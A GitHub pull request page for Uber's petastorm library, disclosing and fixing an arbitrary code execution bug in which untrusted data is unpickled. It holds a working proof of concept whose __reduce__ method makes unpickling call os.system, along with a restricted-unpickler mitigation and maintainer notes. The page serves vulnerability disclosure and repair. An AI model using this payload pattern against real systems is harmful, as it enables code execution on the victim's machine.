uber / petastorm

The Petastorm library enables single-machine or distributed training and evaluation of deep learning models from datasets in Apache Parquet format. It supports ML frameworks such as TensorFlow, PyTorch, and PySpark, and can be used from pure Python code.
Apache License 2.0

Security Fix for Arbitrary Code Execution - huntr.dev #637

Closed huntr-helper closed 2 years ago

huntr-helper commented 3 years ago

https://huntr.dev/users/d3m0n-r00t has fixed the Arbitrary Code Execution vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | https://github.com/418sec/petastorm/pull/1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/petastorm/1/README.md

User Comments:

📊 Metadata *

Fixed Arbitrary code execution in petastorm

Bounty URL: https://www.huntr.dev/bounties/1-pip-petastorm/

⚙️ Description *

Petastorm is an open source data access library developed at Uber ATG. This library enables single machine or distributed training and evaluation of deep learning models directly from datasets in Apache Parquet format. Petastorm supports popular Python-based machine learning (ML) frameworks such as Tensorflow, PyTorch, and PySpark. It can also be used from pure Python code.

Vulnerability description: untrusted data is loaded by the pickle.load function, leading to arbitrary code execution.

💻 Technical Description *

The function depickle_legacy_package_name_compatible() loads pickled data without any validation, making it vulnerable to arbitrary code execution. If the input is a malicious pickle payload, it can run attacker-chosen commands on the machine that loads it, for example to create a file there.
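Why unpickling alone is enough to run code can be shown with a harmless stand-in. The sketch below is illustrative only: `HarmlessPayload` is a hypothetical class, and the built-in `sorted` takes the place of a dangerous callable such as `os.system`. It uses only the standard `pickle` module, not petastorm.

```python
import pickle


class HarmlessPayload:
    """Hypothetical stand-in for a malicious class (not part of petastorm)."""

    def __reduce__(self):
        # pickle stores "call sorted([3, 1, 2])" instead of the object's state.
        # An attacker would return something like (os.system, ("<command>",)).
        return sorted, ([3, 1, 2],)


data = pickle.dumps(HarmlessPayload())

# Loading does not rebuild a HarmlessPayload instance; it calls the stored
# callable with the stored arguments and returns whatever that call returns.
result = pickle.loads(data)
print(type(result).__name__, result)  # list [1, 2, 3]
```

The loaded value is the return value of the call, which shows that the callable was invoked during loading. Any code path that unpickles attacker-controlled bytes inherits this behaviour.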

🐛 Proof of Concept (PoC) *

import os
import pickle

# Requires petastorm to be installed, e.g. `pip3 install petastorm`.
from petastorm.etl import legacy


# Payload: __reduce__ makes pickle call os.system(cmd) during unpickling.
class ArbitraryCode:
    def __reduce__(self):
        cmd = 'xcalc'
        return os.system, (cmd,)


# Exploit: the vulnerable function unpickles the attacker-controlled bytes.
dumps = pickle.dumps(ArbitraryCode())
legacy.depickle_legacy_package_name_compatible(dumps)

Screenshot 2021-01-05 193250

🔥 Proof of Fix (PoF) *

Screenshot 2021-01-05 193940

The fix in effect when the payload calls subprocess instead. Screenshot 2021-01-05 195008

👍 User Acceptance Testing (UAT)

Applied the fix recommended in the official pickle documentation, as explained here: https://www.cmi.ac.in/~madhavan/courses/python-2014/docs/python-3.2.1-docs-html/library/pickle.html. Benign input (something other than a payload) still loads correctly. Screenshot 2021-01-05 195158
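For reference, the "restricting globals" technique from the pickle documentation can be sketched as follows. This is a minimal illustration under assumptions, not the code from this PR or from #640: the names `RestrictedUnpickler`, `restricted_loads`, `is_rejected`, and the `SAFE_BUILTINS` allow-list are hypothetical, and a real project would need to allow the specific globals its own pickles rely on.

```python
import builtins
import io
import os
import pickle

# Hypothetical allow-list; a real project would list the globals it needs.
SAFE_BUILTINS = frozenset({"range", "complex", "set", "frozenset", "slice"})


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream asks to import.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Everything else (os.system, subprocess.*, ...) is refused.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Like pickle.loads(), but only allow-listed globals may be resolved."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class ArbitraryCode:
    """Same shape as the PoC payload; the command must never run here."""

    def __reduce__(self):
        return os.system, ("echo should-never-run",)


def is_rejected(data):
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


payload_rejected = is_rejected(pickle.dumps(ArbitraryCode()))
benign = restricted_loads(pickle.dumps([1, 2, range(3)]))
```

The payload is refused at the point where the stream tries to resolve `os.system`, before anything is called, while plain data and allow-listed types still load. An allow-list that is too narrow will also reject legitimate pickles, so it has to be tuned to the data a project actually stores.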

CLAassistant commented 3 years ago

CLA assistant check
All committers have signed the CLA.

JamieSlome commented 3 years ago

@d3m0n-r00t - are you able to sign the CLA? Cheers! 🍰

selitvin commented 3 years ago

Thanks for the proposed fix. I created #640, which properly fixes the issue in the context of petastorm (this PR would not pass unit tests).

selitvin commented 2 years ago

Fixed by #640. Closing this PR.